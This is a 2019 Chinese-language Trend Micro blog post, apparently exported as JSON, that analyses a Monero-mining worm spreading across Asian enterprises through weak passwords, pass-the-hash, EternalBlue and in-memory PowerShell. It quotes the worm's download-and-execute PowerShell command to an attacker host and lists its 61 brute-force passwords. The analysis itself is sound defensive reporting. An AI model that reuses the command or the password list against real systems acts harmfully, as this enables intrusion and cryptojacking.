{"id":60232,"date":"2019-04-16T09:00:47","date_gmt":"2019-04-16T01:00:47","guid":{"rendered":"https:\/\/blog.trendmicro.com.tw\/?p=60232"},"modified":"2019-04-16T14:35:26","modified_gmt":"2019-04-16T06:35:26","slug":"%e9%82%84%e5%9c%a8%e4%bd%bf%e7%94%a8%e8%80%81%e8%88%8a%e8%bb%9f%e9%ab%94%e5%92%8c%e9%80%99-61-%e7%b5%84%e5%bc%b1%e5%af%86%e7%a2%bc-%e6%8c%96%e7%a4%a6%e7%97%85%e6%af%92%e5%88%a9%e7%94%a8%e5%a4%9a","status":"publish","type":"post","link":"https:\/\/blog.trendmicro.com.tw\/?p=60232","title":{"rendered":"\u9084\u5728\u4f7f\u7528\u8001\u820a\u8edf\u9ad4\u548c\u9019 61 \u7d44\u5f31\u5bc6\u78bc? \u6316\u7926\u75c5\u6bd2\u5229\u7528\u591a\u91cd\u653b\u64ca\u624b\u6cd5\u81ea\u4e2d\u570b\u64f4\u6563\u81f3\u53f0\u7063\u3001\u65e5\u672c\u7b49\u4e9e\u6d32\u4f01\u696d"},"content":{"rendered":"\n<p><a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2651&amp;name=20110916\">\u8da8\u52e2\u79d1\u6280<\/a>\u5075\u6e2c\u5230\u4e00\u500b\u60e1\u610f\u8edf\u9ad4: Trojan.PS1.LUDICROUZ.A\u7528\u591a\u7a2e\u611f\u67d3\u65b9\u5f0f,\u64f4\u6563\u9580\u7f85\u5e63\u6316\u7926\u7a0b\u5f0f\u5230\u66f4\u591a\u7684\u7cfb\u7d71\u548c\u4f3a\u670d\u5668\u3002\u8a72\u6316\u7926\u75c5\u6bd2\u5728\u4eca\u5e74\u521d<a href=\"https:\/\/www.360.cn\/n\/10571.html\">\u73fe\u8eab<\/a>\u4e2d\u570b\uff0c\u539f\u5148\u7684\u611f\u67d3\u65b9\u5f0f\u662f\u7528\u5f31\u5bc6\u78bc\u53capass-the-hash\uff08\u50b3\u905e\u96dc\u6e4a\uff09\u6280\u8853,\u9084\u6709\u7d93\u7531Windows\u7ba1\u7406\u5de5\u5177\u8207\u516c\u958b\u539f\u59cb\u78bc\u9032\u884c\u66b4\u529b\u7834\u89e3\u653b\u64ca\uff0c \u3002\u5728\u65e5\u672c\u767c\u73fe\u7684\u9019\u8d77\u65b0\u6848\u4f8b\u6703\u7528<a rel=\"noreferrer noopener\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=54909\" target=\"_blank\">EternalBlue(\u6c38\u6046\u4e4b\u85cd)<\/a> \u6f0f\u6d1e\u653b\u64ca\u53caPowerShell\u4f86\u5165\u4fb5\u7cfb\u7d71\u4e26\u8eb2\u907f\u5075\u6e2c\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" src=\"https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2018\/03\/bitcoin-mining4-1024x678.jpg\" alt=\"\u6316\u7926\u75c5\u6bd2\u5229\u7528\u591a\u91cd\u653b\u64ca\u624b\u6cd5\u81ea\u4e2d\u570b\u64f4\u6563\u81f3\u53f0\u7063\u3001\u65e5\u672c\u7b49\u4e9e\u6d32\u4f01\u696d\" class=\"wp-image-54757\" srcset=\"https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2018\/03\/bitcoin-mining4-1024x678.jpg 1024w, https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2018\/03\/bitcoin-mining4-300x199.jpg 300w, https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2018\/03\/bitcoin-mining4-768x509.jpg 768w, https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2018\/03\/bitcoin-mining4-600x397.jpg 600w, https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2018\/03\/bitcoin-mining4-30x20.jpg 30w, https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2018\/03\/bitcoin-mining4.jpg 1386w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u770b\u8d77\u4f86\u653b\u64ca\u8005\u6b63\u5728\u5c07\u6b64\u6bad\u5c4d\u7db2\u8def\u64f4\u5c55\u5230\u5176\u4ed6\u570b\u5bb6\uff1b\u8da8\u52e2\u79d1\u6280\u767c\u73fe\u5728\u53f0\u7063\u3001\u65e5\u672c\u3001\u9999\u6e2f\u3001\u8d8a\u5357\u3001\u5370\u5ea6\u53ca\u6fb3\u6d32\u90fd\u767c\u73fe\u4e86\u6b64\u5a01\u8105\u3002<\/p>\n\n\n\n<p><a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2651&amp;name=20110916\">\u8da8\u52e2\u79d1\u6280<\/a>\u767c\u73fe\u9019\u500b\u60e1\u610f\u8edf\u9ad4\u975e\u5e38\u8907\u96dc\uff0c\u5c08\u9580\u8a2d\u8a08\u6210\u611f\u67d3\u66f4\u591a\u7684\u96fb\u8166\uff0c\u800c\u4e14\u53ef\u4ee5\u4e0d\u6703\u99ac\u4e0a\u88ab\u5075\u6e2c\u5230\u3002\u5b83\u6703\u5229\u7528\u96fb\u8166\u7cfb\u7d71\u548c\u8cc7\u6599\u5eab\u7684\u5f31\u5bc6\u78bc\uff0c\u91dd\u5c0d\u4f01\u696d\u53ef\u80fd\u4ecd\u5728\u4f7f\u7528\u7684\u8001\u820a\u8edf\u9ad4\uff0c\u4f7f\u7528\u6703\u5728\u8a18\u61b6\u9ad4\u5167\u4e0b\u8f09\u548c\u57f7\u884c\u7d44\u4ef6\u7684PowerShell\u8173\u672c\uff0c\u653b\u64ca\u672a\u4fee\u88dc\u7684\u6f0f\u6d1e\u4ee5\u53ca\u4f7f\u7528Windows\u7684\u555f\u52d5\u8cc7\u6599\u593e\u548c\u4efb\u52d9\u6392\u7a0b\u9032\u884c\u5b89\u88dd\u3002<\/p>\n\n\n\n<p>\u9451\u65bcPowerShell\u7684\u65e5\u6f38\u666e\u53ca\u52a0\u4e0a\u6709\u8d8a\u4f86\u8d8a\u591a\u516c\u958b\u53ef\u7528\u7684\u958b\u653e\u7a0b\u5f0f\u78bc\uff0c\u53ef\u4ee5\u9810\u671f\u6703\u770b\u5230\u66f4\u52a0\u8907\u96dc\u7684\u60e1\u610f\u8edf\u9ad4\u3002\u96d6\u7136\u6536\u96c6\u7cfb\u7d71\u8cc7\u8a0a\u4e26\u9001\u56deC&amp;C\u8207\u76f4\u63a5\u7aca\u53d6\u500b\u4eba\u8eab\u4efd\u8cc7\u6599\u76f8\u6bd4\u53ef\u80fd\u986f\u5f97\u5fae\u4e0d\u8db3\u9053\uff0c\u4f46\u7cfb\u7d71\u8cc7\u8a0a\u5c0d\u6a5f\u5668\u4f86\u8aaa\u662f\u7368\u4e00\u7121\u4e8c\u7684\uff0c\u53ef\u4ee5\u7528\u4f86\u8ffd\u8e64\u8b58\u5225\u4f7f\u7528\u8005\u53ca\u5176\u6d3b\u52d5\u3002<\/p>\n\n\n\n<p>\u547c\u7c72\u4f01\u696d\u5118\u65e9\u66f4\u65b0\u7cfb\u7d71, \u4f7f\u7528\u8907\u96dc\u5bc6\u78bc, \u4e26\u61c9\u7528\u53ef\u4ee5\u5f9e\u9598\u9053\u5230\u7aef\u9ede\u4e3b\u52d5\u5c01\u9396\u9019\u4e9b\u5a01\u8105\u548c\u60e1\u610f\u7db2\u5740\u7684\u591a\u5c64\u6b21\u4fdd\u8b77\u7cfb\u7d71\u3002 <\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>\u4e3b\u8981\u6563\u64ad\u65b9\u5f0f\u662f\u5229\u7528\u5f31\u5bc6\u78bc\u767b\u5165\u9023\u63a5\u7db2\u8def\u7684\u5176\u4ed6\u96fb\u8166<em><\/em><\/strong><\/h3>\n\n\n\n<p>\u9019\u500b\u60e1\u610f\u8edf\u9ad4\uff08\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u70baTrojan.PS1.LUDICROUZ.A\uff09\u7684\u4e3b\u8981\u6563\u64ad\u65b9\u5f0f\u662f\u5229\u7528\u5f31\u5bc6\u78bc\u767b\u5165\u9023\u63a5\u7db2\u8def\u7684\u5176\u4ed6\u96fb\u8166\u3002\u5b83\u4e0d\u6703\u76f4\u63a5\u5c07\u81ea\u5df1\u8907\u88fd\u5230\u9023\u63a5\u7684\u7cfb\u7d71\uff0c\u800c\u662f\u900f\u904e\u9060\u7aef\u547d\u4ee4\u4f86\u8b8a\u66f4\u4e2d\u6bd2\u96fb\u8166\u7684\u9632\u706b\u7246\u548c\u7aef\u53e3\u8f49\u767c\u8a2d\u5b9a\uff0c\u5efa\u7acb\u6392\u7a0b\u4f86\u4e0b\u8f09\u4e26\u57f7\u884c\u66f4\u65b0\u7684\u60e1\u610f\u8edf\u9ad4\u3002\u4e0b\u8f09\u7684PowerShell\u8173\u672c\u6703\u57f7\u884c\uff1a<\/p>\n\n\n\n<!--more-->\n\n\n\n<p><em>IEX\n(New-Object Net.WebClient).downloadstring(\u2018hxxp:\/\/v.beahh[.]com\/wm?hp\u2019)<\/em><\/p>\n\n\n\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>\n  123456\n  password\n  PASSWORD\n  football\n  welcome\n  1\n  12\n  21\n  123\n  321\n  1234\n  12345\n  123123\n  123321\n  111111\n  654321\n  666666\n  121212\n  000000\n  222222\n  888888\n  <\/td><td>\n  1111\n  555555\n  1234567\n  12345678\n  123456789\n  987654321\n  admin\n  abc123\n  abcd1234\n  abcd@1234\n  abc@123\n  p@ssword\n  P@ssword\n  p@ssw0rd\n  P@ssw0rd\n  P@SSWORD\n  P@SSW0RD\n  P@$$w0rd\n  P@$$word\n  P@$$w0rd\n  iloveyou\n  <\/td><td>\n  monkey\n  login\n  passw0rd\n  master\n  hello\n  qazwsx\n  password1\n  qwerty\n  baseball\n  qwertyuiop\n  superman\n  1qaz2wsx\n  fuckyou\n  123qwe\n  zxcvbn\n  pass\n  aaaaaa\n  love\n  administrator\n  <\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><em>\u88681 <\/em><em>\u4e3b\u8981\u6563\u64ad\u7528\u7684\u5f31\u5bc6\u78bc\u3002<\/em><\/p>\n\n\n\n<p>\u5b83\u9084\u6703\u5c07\u6b64\u5217\u8868\u8207<em>Invoke-WMIMethod<\/em>\uff08\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u70baHackTool.Win32.Impacket.AI\uff09\u4e00\u8d77\u4f7f\u7528\uff0c\u4f86\u53d6\u5f97\u5c0d\u5176\u4ed6\u96fb\u8166\u7684\u9060\u7aef\u5b58\u53d6\u80fd\u529b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_4-invoke-wmimethod.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_4-invoke-wmimethod.png\"\/><\/figure>\n\n\n\n<p><em>\u57161. Invoke-WMIMethod<\/em><em>\u7528\u4f86\u9060\u7aef\u5b58\u53d6\u4f7f\u7528\u5f31\u5bc6\u78bc\u7684\u96fb\u8166\u3002<\/em><\/p>\n\n\n\n<p>\u60e1\u610f\u8edf\u9ad4\u9084\u6703\u7528<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/in-depth-look-apt-attack-tools-of-the-trade\/\">pass-the-hash<\/a>\u7684\u65b9\u5f0f\uff0c\u5229\u7528\u4f7f\u7528\u8005\u7684\u5bc6\u78bc\u96dc\u6e4a\u4f86\u53d6\u5f97\u9060\u7aef\u4f3a\u670d\u5668\u8a8d\u8b49\u3002\u60e1\u610f\u8edf\u9ad4\u5229\u7528<a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Get-PassHashes.ps1\">Get-PassHashes<\/a>\u547d\u4ee4\u4f86\u53d6\u5f97\u5132\u5b58\u5728\u96fb\u8166\u5167\u7684\u96dc\u6e4a\u503c\uff0c\u518d\u52a0\u4e0a\u4e86\u6240\u5217\u51fa\u5f31\u5bc6\u78bc\u7684\u96dc\u6e4a\u503c\u3002\u6709\u4e86\u9019\u4e9b\u96dc\u6e4a\u503c\u5f8c\uff0c\u60e1\u610f\u8edf\u9ad4\u5229\u7528<a href=\"https:\/\/github.com\/Kevin-Robertson\/Invoke-TheHash\/blob\/master\/Invoke-SMBClient.ps1\">Invoke-SMBClient<\/a>\uff08\u53e6\u4e00\u500b\u516c\u958b\u8173\u672c\uff09\u900f\u904epass-the-hash\u9032\u884c\u6a94\u6848\u5171\u4eab\u64cd\u4f5c\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_5-get-passhashes.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_5-get-passhashes.png\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_17-weak-pwords.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_17-weak-pwords.png\"\/><\/figure>\n\n\n\n<p><em>\u57162. <\/em><em>\u60e1\u610f\u8edf\u9ad4\u5229\u7528pass-the-hash<\/em><em>\u6280\u8853\u53d6\u5f97\u4f7f\u7528\u8005\u5bc6\u78bc\u96dc\u6e4a\u503c\u53ca\u5f31\u5bc6\u78bc\u96dc\u6e4a\u503c\u3002<\/em><\/p>\n\n\n\n<p>\u6210\u529f\u4e4b\u5f8c\uff0c\u5b83\u6703\u522a\u9664\u6a94\u6848<em>%Start Menu%\\Programs\\Startup\\run.bat<\/em>\uff0c\u9019\u53ef\u80fd\u662f\u820a\u7248\u672c\u7684\u60e1\u610f\u8edf\u9ad4\u3002\u5b83\u9084\u6703\u522a\u9664\u4ee5\u4e0b\u5167\u5bb9\uff1a<\/p>\n\n\n\n<ul><li><em>%Application Data%\\flashplayer.tmp<\/em><\/li><li><em>%Application Data%\\sign.txt<\/em> \u2013 \u7528\u4f86\u8868\u793a\u96fb\u8166\u5df2\u88ab\u611f\u67d3<\/li><li><em>%Start Menu%\\Programs\\Startup\\FlashPlayer.lnk<\/em> \u2013 \u8ca0\u8cac\u5728\u555f\u52d5\u6642\u57f7\u884c\u8173\u672ctmp<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>\u5229\u7528EternalBlue\u6f0f\u6d1e\u53ca\u6feb\u7528<\/strong>PowerShell,<strong>\u653b\u64ca\u975e\u5f31\u5bc6\u78bc\u7528\u6236<\/strong><\/h3>\n\n\n\n<p>\u5982\u679c\u7528\u6236\u4f7f\u7528\u8f03\u5f37\u7684\u5bc6\u78bc\uff0c\u5247\u60e1\u610f\u8edf\u9ad4\u6703\u7528<a href=\"https:\/\/blog.trendmicro.com.tw\/?p=54909\" target=\"_blank\" rel=\"noreferrer noopener\">EternalBlue(\u6c38\u6046\u4e4b\u85cd)<\/a> \u9032\u884c\u6563\u64ad\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_18-eternalblue.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_18-eternalblue.png\"\/><\/figure>\n\n\n\n<p><em>\u57163. <\/em><em>\u6f0f\u6d1e\u653b\u64ca\u7684\u60e1\u610f\u8ca0\u8377\u3002<\/em><\/p>\n\n\n\n<p>\u7576\u96fb\u8166\u88ab\u4efb\u4e00\u65b9\u5f0f\u611f\u67d3\u5f8c\uff0c\u60e1\u610f\u8edf\u9ad4\u6703\u53d6\u5f97MAC\u5730\u5740\u4e26\u6536\u96c6\u96fb\u8166\u5167\u5b89\u88dd\u9632\u6bd2\u7522\u54c1\u7684\u8cc7\u8a0a\u3002\u5b83\u6703\u5f9eC&amp;C\u4f3a\u670d\u5668\u4e0b\u8f09\u53e6\u4e00\u500b\u6df7\u6dc6\u904e\u7684PowerShell\u8173\u672c\uff08\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u70ba<a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/Trojan.PS1.PCASTLE.B\">Trojan.PS1.PCASTLE.B<\/a>\uff09\uff0c\u5206\u6790\u986f\u793a\u4e0b\u8f09\u7db2\u5740\u6703\u5c07\u4e4b\u524d\u6240\u53d6\u5f97\u8cc7\u8a0a\u9001\u56de\u7d66\u653b\u64ca\u8005\u3002\u4e0b\u8f09\u7684PowerShell\u662f\u8ca0\u8cac\u4e0b\u8f09\u53ca\u57f7\u884c\u60e1\u610f\u8edf\u9ad4\u7684\u7d44\u4ef6\uff0c\u5927\u591a\u662f\u81ea\u8eab\u7684\u526f\u672c\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_7-acquire-MAC-AV.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_7-acquire-MAC-AV.png\"\/><\/figure>\n\n\n\n<p><em>\u57164. <\/em><em>\u60e1\u610f\u8edf\u9ad4\u7528\u4f86\u53d6\u5f97MAC<\/em><em>\u5730\u5740\u548c\u9632\u6bd2\u7522\u54c1\u7684\u884c\u70ba\u3002<\/em><\/p>\n\n\n\n<p>\u8981\u6aa2\u67e5\u60e1\u610f\u8edf\u9ad4\u662f\u5426\u5df2\u5b89\u88dd\u5176\u7d44\u4ef6\uff0c\u5b83\u6703\u5c0b\u627e\u4e0b\u5217\u6a94\u6848\uff1a<\/p>\n\n\n\n<ul><li>%Temp%\\kkk1.log<\/li><li>%Temp%\\pp2.log<\/li><li>%Temp%\\333.log<\/li><li>%Temp%\\kk4.log<\/li><li>%Temp%\\kk5.log<\/li><\/ul>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_19-check-malw-comp.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_19-check-malw-comp.png\"\/><\/figure>\n\n\n\n<p><em>\u57165. <\/em><em>\u6aa2\u67e5\u5df2\u5b89\u88dd\u7684\u60e1\u610f\u8edf\u9ad4\u7d44\u4ef6\u3002<\/em><\/p>\n\n\n\n<p>\u6bcf\u500b<em>$flagX<\/em>\u4ee3\u8868\u4e00\u500b\u7d44\u4ef6\uff0c\u60e1\u610f\u8edf\u9ad4\u6703\u4e0b\u8f09\u4e00\u500b\u8f03\u65b0\u7248\u672c\u7684PowerShell\u8173\u672c\uff08<em>$flag<\/em>\uff09\u4e26\u5efa\u7acb\u6392\u7a0b\u4f86\u5b9a\u671f\u57f7\u884c\uff08\u5982\u679c\u5c1a\u672a\u8a2d\u5b9a\u7684\u8a71\uff09\u3002\u60e1\u610f\u8edf\u9ad4\u7684\u884c\u70ba\u53d6\u6c7a\u65bc\u5b83\u904b\u884c\u7684\u6b0a\u9650\u3002$flag2\u9084\u6703\u5f9e\u4e0d\u540c\u7db2\u5740\u4e0b\u8f09\u60e1\u610f\u8edf\u9ad4\u526f\u672c\uff0c\u4e26\u5efa\u7acb\u4e0d\u540c\u540d\u7a31\u7684\u6392\u7a0b\u4efb\u52d9\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_8Sflag.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_8Sflag.png\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_9Sflag.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_9Sflag.png\"\/><\/figure>\n\n\n\n<p><em>\u57166. <\/em><em>\u6392\u7a0b\u4efb\u52d9\u7684$flag<\/em><em>\u548c$flag2<\/em><em>\u3002<\/em><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>\u6536\u96c6\u7cfb\u7d71\u8cc7\u8a0a<\/strong><\/h3>\n\n\n\n<p>\u7b2c\u4e09\u500b\u7d44\u4ef6\uff08\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u70ba<a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/TrojanSpy.Win32.BEAHNY.THCACAI\">TrojanSpy.Win32.BEAHNY.THCACAI<\/a>\uff09\u662f\u6703\u6536\u96c6\u7cfb\u7d71\u8cc7\u8a0a\u7684\u6728\u99ac\u7a0b\u5f0f\uff08\u5305\u6210\u8f03\u5927\u7684\u6a94\u6848\uff0c\u53ef\u80fd\u662f\u70ba\u4e86\u8eb2\u907f\u6c99\u7bb1\u5075\u6e2c\uff09\uff1a<\/p>\n\n\n\n<ul><li>\u96fb\u8166\u540d\u7a31<\/li><li>\u6a5f\u5668\u7684GUID<\/li><li>MAC\u5730\u5740<\/li><li>\u4f5c\u696d\u7cfb\u7d71\u7248\u672c<\/li><li>\u986f\u5361\u8a18\u61b6\u9ad4\u8cc7\u8a0a<\/li><li>\u7cfb\u7d71\u6642\u9593<\/li><\/ul>\n\n\n\n<p>\u7b2c\u56db\u500b\u7d44\u4ef6\u662fPython\u7de8\u8b6f\u7684\u4e8c\u9032\u5236\u57f7\u884c\u6a94\uff0c\u7528\u4f86\u9032\u4e00\u6b65\u5730\u6563\u64ad\u60e1\u610f\u8edf\u9ad4\u3002\u5b83\u4e5f\u80fd\u5920\u900f\u904e\u4f7f\u7528Mimikatz\u7684PowerShell\uff08\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u70ba<a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/TrojanSpy.Win32.BEAHNY.THCACAI\">Trojan.PS1.MIMIKATZ.ADW<\/a>\uff09\u4f86\u9032\u884cpass-the-hash\u653b\u64ca\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_10-drop-4th-component.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_10-drop-4th-component.png\"\/><\/figure>\n\n\n\n<p><em>\u57167. <\/em><em>\u690d\u5165\u7b2c\u56db\u500b\u7d44\u4ef6\u3002<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_11-checking-mimikatz.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_11-checking-mimikatz.png\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_12-execute-mimikatz.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_12-execute-mimikatz.png\"\/><\/figure>\n\n\n\n<p><em>\u57168. <\/em><em>\u6aa2\u67e5Mimikatz<\/em><em>\u7d44\u4ef6\u662f\u5426\u5b89\u88dd\uff0c\u4e26\u57f7\u884cMimikatz<\/em><em>\u3002<\/em><\/p>\n\n\n\n<p>\u60e1\u610f\u8edf\u9ad4\u9084\u6703\u5617\u8a66\u7528\u5f31SQL\u5bc6\u78bc\u4f86\u9023\u5230\u6709\u6f0f\u6d1e\u7684\u8cc7\u6599\u5eab\u4f3a\u670d\u5668\uff0c\u4e26\u5728\u9023\u7dda\u6642\u57f7\u884cshell\u547d\u4ee4<em><a href=\"https:\/\/docs.microsoft.com\/en-us\/sql\/database-engine\/configure-windows\/xp-cmdshell-server-configuration-option?view=sql-server-2017\">xp_cmdshell<\/a><\/em>\u3002\u8207\u4e3b\u6a94\u6848\u4e00\u6a23\uff0c\u8a72\u7d44\u4ef6\u5229\u7528\u8ddf\u904e\u53bb<a href=\"https:\/\/github.com\/jflyup\/goMS17-010\/blob\/master\/ms17-010.py\">\u6f0f\u6d1e\u653b\u64ca<\/a>\u6709\u95dc\u7684\u516c\u958b\u7a0b\u5f0f\u78bc\u4f86\u6383\u63cfIP\u5340\u584a\u627e\u51fa\u53ef\u4ee5\u7528EternalBlue\u653b\u64ca\u7684\u6709\u6f0f\u6d1e\u7cfb\u7d71\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_13-scan-database.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_13-scan-database.png\"\/><\/figure>\n\n\n\n<p><em>\u57169. <\/em><em>\u6383\u63cf\u627e\u51fa\u6709\u6f0f\u6d1e\u7684\u8cc7\u6599\u5eab\u4f3a\u670d\u5668\u3002<\/em><\/p>\n\n\n\n<p>\u7b2c\u4e94\u500b\u7d44\u4ef6\u662f\u9700\u8981\u4e0b\u8f09\u57f7\u884c\u7684\u53ef\u57f7\u884c\u6a94\u3002\u4f46\u4e0b\u8f09\u7db2\u5740\u5728\u672c\u6587\u64b0\u5beb\u6642\u9084\u662f\u96e2\u7dda\u72c0\u614b\u3002<\/p>\n\n\n\n<p>\u60e1\u610f\u8edf\u9ad4\u6240\u7528\u7684\u9580\u7f85\u5e63\u63a1\u7926\u7a0b\u5f0f\u4e5f\u662f\u900f\u904ePowerShell\u90e8\u7f72\uff0c\u4f46\u4e26\u4e0d\u5132\u5b58\u5728\u6a94\u6848\u88e1\u3002\u800c\u662f\u7528\u53e6\u4e00\u500b\u516c\u958b\u7a0b\u5f0f\u78bc<a href=\"https:\/\/github.com\/M00nRise\/ProcessHider\/blob\/master\/PowerShell\/Invoke-ReflectivePEInjection.ps1\">Invoke-ReflectivePEInjection<\/a>\u4f86\u6ce8\u5165\u81ea\u5df1\u7684PowerShell\u7a0b\u5e8f\u3002\u5b89\u88dd\u5f8c\uff0c\u60e1\u610f\u8edf\u9ad4\u6703\u5c07\u5176\u72c0\u614b\u56de\u5831\u7d66C&amp;C\u4f3a\u670d\u5668\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_14-powershell-for-payload.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_14-powershell-for-payload.png\"\/><\/figure>\n\n\n\n<p><em>\u571610. <\/em><em>\u4e0b\u8f09\u4e26\u57f7\u884c\u6316\u7926\u7a0b\u5f0f\u7684PowerShell<\/em><em>\u8173\u672c\u3002<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_15-executing-the-miner.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_15-executing-the-miner.png\"\/><\/figure>\n\n\n\n<p><em>\u571611. <\/em><em>\u57f7\u884c\u6316\u7926\u7a0b\u5f0f\u3002<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_16-new-URL.png\" alt=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_16-new-URL.png\"\/><\/figure>\n\n\n\n<p><em>\u571612. <\/em><em>\u60e1\u610f\u8edf\u9ad4\u7684\u65b0\u7db2\u5740\u3002<\/em><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>\u5118\u65e9\u66f4\u65b0\u7cfb\u7d71, \u4f7f\u7528\u8907\u96dc\u5bc6\u78bc, \u5f9e\u9598\u9053\u5230\u7aef\u9ede\u591a\u5c64\u6b21\u4fdd\u8b77\u7cfb\u7d71<\/strong><\/h3>\n\n\n\n<p><a 